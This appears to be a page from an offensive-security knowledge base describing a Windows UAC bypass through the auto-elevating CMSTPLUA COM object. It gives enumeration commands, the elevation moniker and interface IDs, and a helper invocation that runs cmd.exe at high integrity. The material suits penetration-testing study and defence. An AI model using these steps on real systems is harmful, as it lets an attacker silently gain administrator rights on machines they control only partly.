Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter II - Local / 04. Windows / 02. Privilege Escalation / UAC Bypass

COM Auto Elevation

Some COM objects are approved for automatic elevation when called by a filtered local administrator.

This is a filtered admin to elevated admin primitive. It does not help a normal standard user unless that user can first become a local administrator.

The important registry location is:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\UAC\COMAutoApprovalList

One commonly abused class is CMSTPLUA:

{3E5FC7F9-9A51-4367-9063-A120244FBEC7}

The operator requests the object through the COM elevation moniker and calls ICMLuaUtil::ShellExec to start a high-integrity process.

When enumerating COM auto-elevation opportunities, try to identify:

  • Current user is a local administrator
  • Current shell is medium integrity
  • UAC is enabled
  • UAC is not set to always notify
  • Target CLSID appears under COMAutoApprovalList
  • Target class exposes a useful elevated method
  • Session can interact with elevated desktop behavior

Enumeration

Check identity and integrity:

whoami /groups | findstr /i "Administrators"
whoami /groups | findstr /i "Mandatory"

Check UAC settings:

reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA

reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin

reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v PromptOnSecureDesktop

Enumerate auto-approved COM classes:

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\UAC\COMAutoApprovalList"

Check the CMSTPLUA class:

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\UAC\COMAutoApprovalList" /v "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"

reg query "HKCR\CLSID\{3E5FC7F9-9A51-4367-9063-A120244FBEC7}\Elevation"

reg query "HKCR\CLSID\{3E5FC7F9-9A51-4367-9063-A120244FBEC7}\LocalServer32"

Interesting findings include:

  • User is a local administrator
  • Integrity level is Medium Mandatory Level
  • ConsentPromptBehaviorAdmin is 0x5
  • CMSTPLUA is auto-approved
  • Elevation\Enabled is set to 0x1

Once these conditions line up, test with a harmless proof command before running payloads.

Exploit

  1. Compile or stage a helper that calls CoGetObject with this moniker:
Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  1. Request the ICMLuaUtil interface:
{6EDD6D74-C007-4E75-B76A-E5740995E24C}
  1. Call ShellExec with a controlled command:
CmstpluaBypass.exe "C:\Windows\System32\cmd.exe" "/c whoami /groups > C:\Windows\System32\ootw-uac-com.txt"
  1. Verify high-integrity execution:
type C:\Windows\System32\ootw-uac-com.txt

Expected finding:

High Mandatory Level

COM-based UAC bypasses depend heavily on:

  • Windows build
  • UAC settings
  • COM object behavior
  • Current integrity level
  • Whether the session can interact with elevation mechanisms

ConsentPromptBehaviorAdmin is especially important.

If Windows requires a prompt, the bypass is failing.